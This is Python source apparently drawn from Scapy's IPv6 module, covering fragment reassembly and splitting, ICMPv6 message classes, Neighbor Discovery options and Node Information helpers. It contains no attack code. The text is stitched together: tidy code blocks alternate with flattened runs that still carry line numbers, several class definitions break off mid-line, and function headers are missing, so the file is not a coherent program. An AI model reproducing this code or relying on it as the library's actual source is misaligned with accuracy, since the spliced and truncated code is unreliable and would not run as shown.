    Crap is dropped. What lacks is completed by 'X' characters.

    Only packets holding an IPv6ExtHdrFragment are considered, and among
    them only those sharing the fragment id of the first one (a warning is
    emitted when others are discarded). Fragments are then ordered by
    increasing offset; fragments with the same offset keep their relative
    input order.

    Returns an empty list when 'packets' holds no fragment, otherwise the
    reassembled packet as an IPv6 instance rebuilt from its raw bytes.

    NOTE: the lowest-offset fragment found in 'packets' is modified in place
    (the 'nh' of the layer under its fragment header is overwritten and that
    layer's payload is removed) while the result is being rebuilt.
    """
    # remove non fragments
    frags = [p for p in packets if IPv6ExtHdrFragment in p]
    if not frags:
        return []

    # Only keep the fragments of the datagram the first fragment belongs to
    frag_id = frags[0][IPv6ExtHdrFragment].id
    same_id = [p for p in frags if p[IPv6ExtHdrFragment].id == frag_id]
    if len(same_id) != len(frags):
        warning("defragment6: some fragmented packets have been removed from list")

    # reorder fragments. sorted() is stable, which matches a selection sort
    # that always extracts the first packet having the smallest offset.
    res = sorted(same_id, key=lambda p: p[IPv6ExtHdrFragment].offset)

    # regenerate the fragmentable part
    fragmentable = b""
    for p in res:
        q = p[IPv6ExtHdrFragment]
        offset = 8 * q.offset  # the offset field counts 8-octet units
        if offset != len(fragmentable):
            warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset))
        # A negative count (overlapping fragment) yields no padding at all
        fragmentable += b"X" * (offset - len(fragmentable))
        fragmentable += raw(q.payload)

    # Regenerate the unfragmentable part.
    q = res[0]
    nh = q[IPv6ExtHdrFragment].nh
    q[IPv6ExtHdrFragment].underlayer.nh = nh
    del q[IPv6ExtHdrFragment].underlayer.payload
    q /= conf.raw_layer(load=fragmentable)

    return IPv6(raw(q))
1173 """ 1174 1175 pkt = pkt.copy() 1176 1177 if not IPv6ExtHdrFragment in pkt: 1178 # TODO : automatically add a fragment before upper Layer 1179 # at the moment, we do nothing and return initial packet 1180 # as single element of a list 1181 return [pkt] 1182 1183 # If the payload is bigger than 65535, a Jumbo payload must be used, as 1184 # an IPv6 packet can't be bigger than 65535 bytes. 1185 if len(raw(pkt[IPv6ExtHdrFragment])) > 65535: 1186 warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.") 1187 return [] 1188 1189 s = raw(pkt) # for instantiation to get upper layer checksum right 1190 1191 if len(s) <= fragSize: 1192 return [pkt] 1193 1194 # Fragmentable part : fake IPv6 for Fragmentable part length computation 1195 fragPart = pkt[IPv6ExtHdrFragment].payload 1196 tmp = raw(IPv6(src="::1", dst="::1")/fragPart) 1197 fragPartLen = len(tmp) - 40 # basic IPv6 header length 1198 fragPartStr = s[-fragPartLen:] 1199 1200 # Grab Next Header for use in Fragment Header 1201 nh = pkt[IPv6ExtHdrFragment].nh 1202 1203 # Keep fragment header 1204 fragHeader = pkt[IPv6ExtHdrFragment] 1205 del fragHeader.payload # detach payload 1206 1207 # Unfragmentable Part 1208 unfragPartLen = len(s) - fragPartLen - 8 1209 unfragPart = pkt 1210 del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload 1211 1212 # Cut the fragmentable part to fit fragSize. Inner fragments have 1213 # a length that is an integer multiple of 8 octets. last Frag MTU 1214 # can be anything below MTU 1215 lastFragSize = fragSize - unfragPartLen - 8 1216 innerFragSize = lastFragSize - (lastFragSize % 8) 1217 1218 if lastFragSize <= 0 or innerFragSize == 0: 1219 warning("Provided fragment size value is too low. " + 1220 "Should be more than %d" % (unfragPartLen + 8)) 1221 return [unfragPart/fragHeader/fragPart] 1222 1223 remain = fragPartStr 1224 res = [] 1225 fragOffset = 0 # offset, incremeted during creation 1226 fragId = random.randint(0,0xffffffff) # random id ... 
1227 if fragHeader.id is not None: # ... except id provided by user 1228 fragId = fragHeader.id 1229 fragHeader.m = 1 1230 fragHeader.id = fragId 1231 fragHeader.nh = nh 1232 1233 # Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ... 1234 while True: 1235 if (len(remain) > lastFragSize): 1236 tmp = remain[:innerFragSize] 1237 remain = remain[innerFragSize:] 1238 fragHeader.offset = fragOffset # update offset 1239 fragOffset += (innerFragSize // 8) # compute new one 1240 if IPv6 in unfragPart: 1241 unfragPart[IPv6].plen = None 1242 tempo = unfragPart/fragHeader/conf.raw_layer(load=tmp) 1243 res.append(tempo) 1244 else: 1245 fragHeader.offset = fragOffset # update offSet 1246 fragHeader.m = 0 1247 if IPv6 in unfragPart: 1248 unfragPart[IPv6].plen = None 1249 tempo = unfragPart/fragHeader/conf.raw_layer(load=remain) 1250 res.append(tempo) 1251 break 1252 return res 1253 1254 1255############################### AH Header ################################### 1256 1257# class _AHFieldLenField(FieldLenField): 1258# def getfield(self, pkt, s): 1259# l = getattr(pkt, self.fld) 1260# l = (l*8)-self.shift 1261# i = self.m2i(pkt, s[:l]) 1262# return s[l:],i 1263 1264# class _AHICVStrLenField(StrLenField): 1265# def i2len(self, pkt, x): 1266 1267 1268 1269# class IPv6ExtHdrAH(_IPv6ExtHdr): 1270# name = "IPv6 Extension Header - AH" 1271# fields_desc = [ ByteEnumField("nh", 59, ipv6nh), 1272# _AHFieldLenField("len", None, "icv"), 1273# ShortField("res", 0), 1274# IntField("spi", 0), 1275# IntField("sn", 0), 1276# _AHICVStrLenField("icv", None, "len", shift=2) ] 1277# overload_fields = {IPv6: { "nh": 51 }} 1278 1279# def post_build(self, pkt, pay): 1280# if self.len is None: 1281# pkt = pkt[0]+struct.pack("!B", 2*len(self.addresses))+pkt[2:] 1282# if self.segleft is None: 1283# pkt = pkt[:3]+struct.pack("!B", len(self.addresses))+pkt[4:] 1284# return _IPv6ExtHdr.post_build(self, pkt, pay) 1285 1286 1287############################### ESP Header ################################## 
1288 1289# class IPv6ExtHdrESP(_IPv6extHdr): 1290# name = "IPv6 Extension Header - ESP" 1291# fields_desc = [ IntField("spi", 0), 1292# IntField("sn", 0), 1293# # there is things to extract from IKE work 1294# ] 1295# overloads_fields = {IPv6: { "nh": 50 }} 1296 1297 1298 1299############################################################################# 1300############################################################################# 1301### ICMPv6* Classes ### 1302############################################################################# 1303############################################################################# 1304 1305icmp6typescls = { 1: "ICMPv6DestUnreach", 1306 2: "ICMPv6PacketTooBig", 1307 3: "ICMPv6TimeExceeded", 1308 4: "ICMPv6ParamProblem", 1309 128: "ICMPv6EchoRequest", 1310 129: "ICMPv6EchoReply", 1311 130: "ICMPv6MLQuery", 1312 131: "ICMPv6MLReport", 1313 132: "ICMPv6MLDone", 1314 133: "ICMPv6ND_RS", 1315 134: "ICMPv6ND_RA", 1316 135: "ICMPv6ND_NS", 1317 136: "ICMPv6ND_NA", 1318 137: "ICMPv6ND_Redirect", 1319 #138: Do Me - RFC 2894 - Seems painful 1320 139: "ICMPv6NIQuery", 1321 140: "ICMPv6NIReply", 1322 141: "ICMPv6ND_INDSol", 1323 142: "ICMPv6ND_INDAdv", 1324 #143: Do Me - RFC 3810 1325 144: "ICMPv6HAADRequest", 1326 145: "ICMPv6HAADReply", 1327 146: "ICMPv6MPSol", 1328 147: "ICMPv6MPAdv", 1329 #148: Do Me - SEND related - RFC 3971 1330 #149: Do Me - SEND related - RFC 3971 1331 151: "ICMPv6MRD_Advertisement", 1332 152: "ICMPv6MRD_Solicitation", 1333 153: "ICMPv6MRD_Termination", 1334 } 1335 1336icmp6typesminhdrlen = { 1: 8, 1337 2: 8, 1338 3: 8, 1339 4: 8, 1340 128: 8, 1341 129: 8, 1342 130: 24, 1343 131: 24, 1344 132: 24, 1345 133: 8, 1346 134: 16, 1347 135: 24, 1348 136: 24, 1349 137: 40, 1350 #139: 1351 #140 1352 141: 8, 1353 142: 8, 1354 144: 8, 1355 145: 8, 1356 146: 8, 1357 147: 8, 1358 151: 8, 1359 152: 4, 1360 153: 4 1361 } 1362 1363icmp6types = { 1 : "Destination unreachable", 1364 2 : "Packet too big", 1365 3 : "Time exceeded", 
class _ICMPv6(Packet):
    """
    Base class shared by the ICMPv6 message classes.

    Provides checksum computation at build time and a default matching of
    answers on the type and code fields.
    """
    name = "ICMPv6 dummy class"
    overload_fields = {IPv6: {"nh": 58}}

    def post_build(self, p, pay):
        """
        Append the payload and, when 'cksum' was left to None, write the
        value returned by in6_chksum() into octets 2-3 of the message.
        """
        p += pay
        if self.cksum is None:
            chksum = in6_chksum(58, self.underlayer, p)
            p = p[:2] + struct.pack("!H", chksum) + p[4:]
        return p

    def hashret(self):
        """Delegate the hash used to pair requests and answers to the payload."""
        return self.payload.hashret()

    def answers(self, other):
        """
        Return 1 when this message, found under an IPerror6 or an IPv6
        extension header, has the same type and code as the ICMPv6 message
        'other'; 0 otherwise.
        """
        # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ...
        nested = isinstance(self.underlayer, (IPerror6, _IPv6ExtHdr))
        # 'other' must be an ICMPv6 message whatever the underlayer is:
        # without the explicit grouping, 'and' binds tighter than 'or' and
        # the check was skipped under IPerror6, so 'type' and 'code' were
        # read from packets that may not define them.
        if not (nested and isinstance(other, _ICMPv6)):
            return 0
        if self.type == other.type and self.code == other.code:
            return 1
        return 0
class ICMPv6EchoRequest(_ICMPv6):
    """ICMPv6 Echo Request message (type 128)."""
    name = "ICMPv6 Echo Request"
    fields_desc = [
        ByteEnumField("type", 128, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XShortField("id", 0),
        XShortField("seq", 0),
        StrField("data", ""),
    ]

    def mysummary(self):
        """One-line summary showing the identifier and sequence number."""
        summary_fmt = "%name% (id: %id% seq: %seq%)"
        return self.sprintf(summary_fmt)

    def hashret(self):
        """Hash on (id, seq), followed by whatever the payload hashes on."""
        own_key = struct.pack("HH", self.id, self.seq)
        return own_key + self.payload.hashret()
class ICMPv6MLQuery(_ICMPv6ML):  # RFC 2710
    """
    MLD Multicast Listener Query.

    The defaults describe a General Query: 'mladdr' is "::" and the IPv6
    layer underneath is overloaded with destination ff02::1 and a hop
    limit of 1.
    """
    name = "MLD - Multicast Listener Query"
    type = 130
    mrd = 10000  # 10s for mrd
    mladdr = "::"
    overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}}

    def hashret(self):
        """
        Hash used to pair a query with its answers: the payload hash,
        prefixed with the packed multicast address for an address-specific
        query (mladdr other than "::").
        """
        if self.mladdr == "::":
            return self.payload.hashret()
        packed_addr = inet_pton(socket.AF_INET6, self.mladdr)
        return packed_addr + self.payload.hashret()
class ICMPv6MRD_Advertisement(_ICMPv6):
    """Multicast Router Discovery Advertisement (type 151)."""
    name = "ICMPv6 Multicast Router Discovery Advertisement"
    fields_desc = [
        ByteEnumField("type", 151, icmp6types),
        ByteField("advinter", 20),
        XShortField("cksum", None),
        ShortField("queryint", 0),
        ShortField("robustness", 0),
    ]
    overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}
    # IPv6 Router Alert requires manual inclusion

    def extract_padding(self, s):
        """Split 's' after its first 8 octets and return both parts."""
        head = s[:8]
        tail = s[8:]
        return head, tail
inclusion 1601 def extract_padding(self, s): 1602 return s[:4], s[4:] 1603 1604 1605################### ICMPv6 Neighbor Discovery (RFC 2461) #################### 1606 1607icmp6ndopts = { 1: "Source Link-Layer Address", 1608 2: "Target Link-Layer Address", 1609 3: "Prefix Information", 1610 4: "Redirected Header", 1611 5: "MTU", 1612 6: "NBMA Shortcut Limit Option", # RFC2491 1613 7: "Advertisement Interval Option", 1614 8: "Home Agent Information Option", 1615 9: "Source Address List", 1616 10: "Target Address List", 1617 11: "CGA Option", # RFC 3971 1618 12: "RSA Signature Option", # RFC 3971 1619 13: "Timestamp Option", # RFC 3971 1620 14: "Nonce option", # RFC 3971 1621 15: "Trust Anchor Option", # RFC 3971 1622 16: "Certificate Option", # RFC 3971 1623 17: "IP Address Option", # RFC 4068 1624 18: "New Router Prefix Information Option", # RFC 4068 1625 19: "Link-layer Address Option", # RFC 4068 1626 20: "Neighbor Advertisement Acknowledgement Option", 1627 21: "CARD Request Option", # RFC 4065/4066/4067 1628 22: "CARD Reply Option", # RFC 4065/4066/4067 1629 23: "MAP Option", # RFC 4140 1630 24: "Route Information Option", # RFC 4191 1631 25: "Recusive DNS Server Option", 1632 26: "IPv6 Router Advertisement Flags Option" 1633 } 1634 1635icmp6ndoptscls = { 1: "ICMPv6NDOptSrcLLAddr", 1636 2: "ICMPv6NDOptDstLLAddr", 1637 3: "ICMPv6NDOptPrefixInfo", 1638 4: "ICMPv6NDOptRedirectedHdr", 1639 5: "ICMPv6NDOptMTU", 1640 6: "ICMPv6NDOptShortcutLimit", 1641 7: "ICMPv6NDOptAdvInterval", 1642 8: "ICMPv6NDOptHAInfo", 1643 9: "ICMPv6NDOptSrcAddrList", 1644 10: "ICMPv6NDOptTgtAddrList", 1645 #11: Do Me, 1646 #12: Do Me, 1647 #13: Do Me, 1648 #14: Do Me, 1649 #15: Do Me, 1650 #16: Do Me, 1651 17: "ICMPv6NDOptIPAddr", 1652 18: "ICMPv6NDOptNewRtrPrefix", 1653 19: "ICMPv6NDOptLLA", 1654 #18: Do Me, 1655 #19: Do Me, 1656 #20: Do Me, 1657 #21: Do Me, 1658 #22: Do Me, 1659 23: "ICMPv6NDOptMAP", 1660 24: "ICMPv6NDOptRouteInfo", 1661 25: "ICMPv6NDOptRDNSS", 1662 26: "ICMPv6NDOptEFA", 
# TODO: We should also limit the size of included packet to something
# like (initiallen - 40 - 2)
class TruncPktLenField(PacketLenField):
    """
    Packet field whose built value is truncated so that the number of
    octets emitted, plus 'cur_shift', is a multiple of 8.

    'cur_shift' is the number of octets already present in the enclosing
    structure before this field. The 'shift' argument is accepted but not
    used; it is kept so that existing callers passing it keep working.
    """
    __slots__ = ["cur_shift"]

    def __init__(self, name, default, cls, cur_shift, length_from=None, shift=0):
        PacketLenField.__init__(self, name, default, cls, length_from=length_from)
        self.cur_shift = cur_shift

    def getfield(self, pkt, s):
        """Dissect the first length_from(pkt) octets of 's'."""
        l = self.length_from(pkt)
        i = self.m2i(pkt, s[:l])
        return s[l:], i

    def m2i(self, pkt, m):
        """
        Dissect 'm' with the field's packet class, falling back on the raw
        layer when that class cannot dissect it.
        """
        try:  # It can happen we have sth shorter than 40 bytes
            return self.cls(m)
        except Exception:
            # Only dissection failures are expected here: KeyboardInterrupt
            # and SystemExit must keep propagating.
            return conf.raw_layer(m)

    def i2m(self, pkt, x):
        """Build 'x' and drop the trailing octets breaking 8-octet alignment."""
        s = raw(x)
        l = len(s)
        # Octets in excess once what precedes the field is accounted for
        r = (l + self.cur_shift) % 8
        l = l - r
        return s[:l]

    def i2len(self, pkt, i):
        """Length in octets of the truncated built value."""
        return len(self.i2m(pkt, i))
Interval Advertisement" 1774 fields_desc = [ ByteField("type",7), 1775 ByteField("len",1), 1776 ShortField("res", 0), 1777 IntField("advint", 0) ] 1778 def mysummary(self): 1779 return self.sprintf("%name% %advint% milliseconds") 1780 1781class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet): 1782 name = "ICMPv6 Neighbor Discovery - Home Agent Information" 1783 fields_desc = [ ByteField("type",8), 1784 ByteField("len",1), 1785 ShortField("res", 0), 1786 ShortField("pref", 0), 1787 ShortField("lifetime", 1)] 1788 def mysummary(self): 1789 return self.sprintf("%name% %pref% %lifetime% seconds") 1790 1791# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support 1792 1793# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support 1794 1795class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068 1796 name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)" 1797 fields_desc = [ ByteField("type",17), 1798 ByteField("len", 3), 1799 ByteEnumField("optcode", 1, {1: "Old Care-Of Address", 1800 2: "New Care-Of Address", 1801 3: "NAR's IP address" }), 1802 ByteField("plen", 64), 1803 IntField("res", 0), 1804 IP6Field("addr", "::") ] 1805 1806class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068 1807 name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)" 1808 fields_desc = [ ByteField("type",18), 1809 ByteField("len", 3), 1810 ByteField("optcode", 0), 1811 ByteField("plen", 64), 1812 IntField("res", 0), 1813 IP6Field("prefix", "::") ] 1814 1815_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP", 1816 1: "LLA for the new AP", 1817 2: "LLA of the MN", 1818 3: "LLA of the NAR", 1819 4: "LLA of the src of TrSolPr or PrRtAdv msg", 1820 5: "AP identified by LLA belongs to current iface of router", 1821 6: "No preifx info available for AP identified by the LLA", 1822 7: "No fast handovers support for AP identified by the LLA" } 1823 1824class 
ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068 1825 name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)" 1826 fields_desc = [ ByteField("type", 19), 1827 ByteField("len", 1), 1828 ByteEnumField("optcode", 0, _rfc4068_lla_optcode), 1829 MACField("lla", ETHER_ANY) ] # We only support ethernet 1830 1831class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140 1832 name = "ICMPv6 Neighbor Discovery - MAP Option" 1833 fields_desc = [ ByteField("type", 23), 1834 ByteField("len", 3), 1835 BitField("dist", 1, 4), 1836 BitField("pref", 15, 4), # highest availability 1837 BitField("R", 1, 1), 1838 BitField("res", 0, 7), 1839 IntField("validlifetime", 0xffffffff), 1840 IP6Field("addr", "::") ] 1841 1842 1843class _IP6PrefixField(IP6Field): 1844 __slots__ = ["length_from"] 1845 def __init__(self, name, default): 1846 IP6Field.__init__(self, name, default) 1847 self.length_from = lambda pkt: 8*(pkt.len - 1) 1848 1849 def addfield(self, pkt, s, val): 1850 return s + self.i2m(pkt, val) 1851 1852 def getfield(self, pkt, s): 1853 l = self.length_from(pkt) 1854 p = s[:l] 1855 if l < 16: 1856 p += b'\x00'*(16-l) 1857 return s[l:], self.m2i(pkt,p) 1858 1859 def i2len(self, pkt, x): 1860 return len(self.i2m(pkt, x)) 1861 1862 def i2m(self, pkt, x): 1863 l = pkt.len 1864 1865 if x is None: 1866 x = "::" 1867 if l is None: 1868 l = 1 1869 x = inet_pton(socket.AF_INET6, x) 1870 1871 if l is None: 1872 return x 1873 if l in [0, 1]: 1874 return b"" 1875 if l in [2, 3]: 1876 return x[:8*(l-1)] 1877 1878 return x + b'\x00'*8*(l-3) 1879 1880class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191 1881 name = "ICMPv6 Neighbor Discovery Option - Route Information Option" 1882 fields_desc = [ ByteField("type",24), 1883 FieldLenField("len", None, length_of="prefix", fmt="B", 1884 adjust = lambda pkt,x: x//8 + 1), 1885 ByteField("plen", None), 1886 BitField("res1",0,3), 1887 BitField("prf",0,2), 1888 BitField("res2",0,3), 1889 
IntField("rtlifetime", 0xffffffff), 1890 _IP6PrefixField("prefix", None) ] 1891 1892class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006 1893 name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option" 1894 fields_desc = [ ByteField("type", 25), 1895 FieldLenField("len", None, count_of="dns", fmt="B", 1896 adjust = lambda pkt,x: 2*x+1), 1897 ShortField("res", None), 1898 IntField("lifetime", 0xffffffff), 1899 IP6ListField("dns", [], 1900 length_from = lambda pkt: 8*(pkt.len-1)) ] 1901 1902class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075) 1903 name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option" 1904 fields_desc = [ ByteField("type", 26), 1905 ByteField("len", 1), 1906 BitField("res", 0, 48) ] 1907 1908# As required in Sect 8. of RFC 3315, Domain Names must be encoded as 1909# described in section 3.1 of RFC 1035 1910# XXX Label should be at most 63 octets in length : we do not enforce it 1911# Total length of domain should be 255 : we do not enforce it either 1912class DomainNameListField(StrLenField): 1913 __slots__ = ["padded"] 1914 islist = 1 1915 padded_unit = 8 1916 1917 def __init__(self, name, default, fld=None, length_from=None, padded=False): 1918 self.padded = padded 1919 StrLenField.__init__(self, name, default, fld, length_from) 1920 1921 def i2len(self, pkt, x): 1922 return len(self.i2m(pkt, x)) 1923 1924 def m2i(self, pkt, x): 1925 x = plain_str(x) # Decode bytes to string 1926 res = [] 1927 while x: 1928 # Get a name until \x00 is reached 1929 cur = [] 1930 while x and ord(x[0]) != 0: 1931 l = ord(x[0]) 1932 cur.append(x[1:l+1]) 1933 x = x[l+1:] 1934 if self.padded: 1935 # Discard following \x00 in padded mode 1936 if len(cur): 1937 res.append(".".join(cur) + ".") 1938 else: 1939 # Store the current name 1940 res.append(".".join(cur) + ".") 1941 if x and ord(x[0]) == 0: 1942 x = x[1:] 1943 return res 1944 1945 def i2m(self, pkt, x): 1946 def conditionalTrailingDot(z): 1947 if z and 
orb(z[-1]) == 0: 1948 return z 1949 return z+b'\x00' 1950 # Build the encode names 1951 tmp = ([chb(len(z)) + z.encode("utf8") for z in y.split('.')] for y in x) # Also encode string to bytes 1952 ret_string = b"".join(conditionalTrailingDot(b"".join(x)) for x in tmp) 1953 1954 # In padded mode, add some \x00 bytes 1955 if self.padded and not len(ret_string) % self.padded_unit == 0: 1956 ret_string += b"\x00" * (self.padded_unit - len(ret_string) % self.padded_unit) 1957 1958 return ret_string 1959 1960class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106 1961 name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option" 1962 fields_desc = [ ByteField("type", 31), 1963 FieldLenField("len", None, length_of="searchlist", fmt="B", 1964 adjust=lambda pkt, x: 1+ x//8), 1965 ShortField("res", None), 1966 IntField("lifetime", 0xffffffff), 1967 DomainNameListField("searchlist", [], 1968 length_from=lambda pkt: 8*pkt.len -8, 1969 padded=True) 1970 ] 1971 1972# End of ICMPv6 Neighbor Discovery Options. 

# Router Solicitation (type 133); sent to ff02::2 by default.
class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
    name = "ICMPv6 Neighbor Discovery - Router Solicitation"
    fields_desc = [
        ByteEnumField("type", 133, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        IntField("res", 0),
    ]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::2", "hlim": 255}}


# Router Advertisement (type 134); answers any Router Solicitation.
class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
    name = "ICMPv6 Neighbor Discovery - Router Advertisement"
    fields_desc = [
        ByteEnumField("type", 134, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        ByteField("chlim", 0),
        BitField("M", 0, 1),
        BitField("O", 0, 1),
        BitField("H", 0, 1),
        # Router preference, RFC 4191
        BitEnumField("prf", 1, 2, {0: "Medium (default)",
                                   1: "High",
                                   2: "Reserved",
                                   3: "Low"}),
        BitField("P", 0, 1),
        BitField("res", 0, 2),
        ShortField("routerlifetime", 1800),
        IntField("reachabletime", 0),
        IntField("retranstimer", 0),
    ]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

    def answers(self, other):
        return isinstance(other, ICMPv6ND_RS)


# Neighbor Solicitation (type 135); hashed on the target address.
class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
    fields_desc = [
        ByteEnumField("type", 135, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        IntField("res", 0),
        IP6Field("tgt", "::"),
    ]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

    def mysummary(self):
        return self.sprintf("%name% (tgt: %tgt%)")

    def hashret(self):
        target = raw(self.tgt)
        return target + self.payload.hashret()


# Neighbor Advertisement (type 136); answers a Neighbor Solicitation that
# carries the same target address.
class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
    fields_desc = [
        ByteEnumField("type", 136, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        BitField("R", 1, 1),
        BitField("S", 0, 1),
        BitField("O", 1, 1),
        XBitField("res", 0, 29),
        IP6Field("tgt", "::"),
    ]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

    def mysummary(self):
        return self.sprintf("%name% (tgt: %tgt%)")

    def hashret(self):
        target = raw(self.tgt)
        return target + self.payload.hashret()

    def answers(self, other):
        if not isinstance(other, ICMPv6ND_NS):
            return False
        return self.tgt == other.tgt


# associated possible options : target link-layer option, Redirected header
class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    name = "ICMPv6 Neighbor Discovery - Redirect"
    fields_desc = [
        ByteEnumField("type", 137, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XIntField("res", 0),
        IP6Field("tgt", "::"),
        IP6Field("dst", "::"),
    ]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}


################ ICMPv6 Inverse Neighbor Discovery (RFC 3122) ###############

# Source Address List option (type 9): 'len' is 2 * (number of addresses) + 1.
class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
    name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
    fields_desc = [
        ByteField("type", 9),
        FieldLenField("len", None, count_of="addrlist", fmt="B",
                      adjust=lambda pkt, x: 2 * x + 1),
        StrFixedLenField("res", b"\x00" * 6, 6),
        IP6ListField("addrlist", [],
                     length_from=lambda pkt: 8 * (pkt.len - 1)),
    ]


# Target Address List option: same layout as the source list, type 10.
class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
    name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
    type = 10


# RFC3122
# Required options: source lladdr and target lladdr
# Other valid options: source address list, MTU
# - As stated in the document, it would be good to take the L2 address
#   requested in the required target lladdr option and use it as the
#   ethernet destination address when no address is specified
# - this does not look very practical if the user has to specify all
#   the options.
# Ether() must use the target lladdr as destination
class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
    # Inverse Neighbor Discovery Solicitation (type 141).
    name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
    fields_desc = [
        ByteEnumField("type", 141, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XIntField("reserved", 0),
    ]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}


# Required options: target lladdr, target address list
# Other valid options: MTU
class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
    # Inverse Neighbor Discovery Advertisement (type 142).
    name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
    fields_desc = [
        ByteEnumField("type", 142, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XIntField("reserved", 0),
    ]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}


###############################################################################
# ICMPv6 Node Information Queries (RFC 4620)
###############################################################################

# [ ] Add automatic destination address computation using computeNIGroupAddr
#     in IPv6 class (Scapy6 modification when integrated) if :
#     - it is not provided
#     - upper layer is ICMPv6NIQueryName() with a valid value
# [ ] Try to be liberal in what we accept as internal values for _explicit_
#     DNS elements provided by users. Any string should be considered
#     valid and kept like it has been provided. At the moment, i2repr() will
#     crash on many inputs
# [ ] Do the documentation
# [ ] Add regression tests
# [ ] Perform test against real machines (NOOP reply is proof of
#     implementation).
# [ ] Check if there are differences between different stacks. Among *BSD,
#     with others.
# [ ] Deal with flags in a consistent way.
# [ ] Implement compression in names2dnsrepr() and decompression in
#     dnsrepr2names(). Should be deactivable.

# Names of the Qtype values used by Node Information queries and replies.
icmp6_niqtypes = {0: "NOOP",
                  2: "Node Name",
                  3: "IPv6 Address",
                  4: "IPv4 Address"}


class _ICMPv6NIHashret:
    """Mixin: hash Node Information messages on their 'nonce' field."""
    def hashret(self):
        return self.nonce


class _ICMPv6NIAnswers:
    """Mixin: a message answers another when both carry the same nonce."""
    def answers(self, other):
        return self.nonce == other.nonce


# Buggy; always returns the same value during a session
class NonceField(StrFixedLenField):
    """8-byte field whose default is self.randval() when none is given."""
    def __init__(self, name, default=None):
        StrFixedLenField.__init__(self, name, default, 8)
        if default is None:
            self.default = self.randval()


@conf.commands.register
def computeNIGroupAddr(name):
    """Compute the NI group Address. Can take a FQDN as input parameter

    Only the first label of 'name' (lower-cased) is used. It is prefixed
    with its length, hashed with MD5, and the first four bytes of the digest
    become the low 32 bits of an address in ff02::2:0:0/96.

    Returns the address as a string.
    """
    name = name.lower().split(".")[0]
    record = chr(len(name)) + name
    digest = md5(record.encode("utf8")).digest()
    # "%02x" and not "%2x": the latter pads with spaces, which produced
    # unparsable addresses whenever a digest byte was below 0x10.
    # NOTE(review): RFC 4620 derives the group address from 24 bits of the
    # hash (ff02::2:ffXX:XXXX); this keeps the 32-bit layout the function has
    # always produced -- confirm which one peers expect.
    addr = "ff02::2:%02x%02x:%02x%02x" % struct.unpack("BBBB", digest[:4])
    return addr


# Here is the deal. The protocol is awkward to model, so we provide 4
# classes for the different kinds of Requests (one for every valid qtype:
# NOOP, Node Name, IPv6@, IPv4@). They all share the same data field class
# that is made to be smart by guessing the specific type of value provided :
#
# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0,
#   if not overridden by user
# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2,
#   if not overridden
# - Name in the other cases: code is set to 1, if not overridden by user
#
# Internal storage is not only the value, but a pair providing
# the type and the value (0 is IPv6@, 1 is Name or string, 2 is IPv4@)
#
# Note : I merged getfield() and m2i(). m2i() should not be called
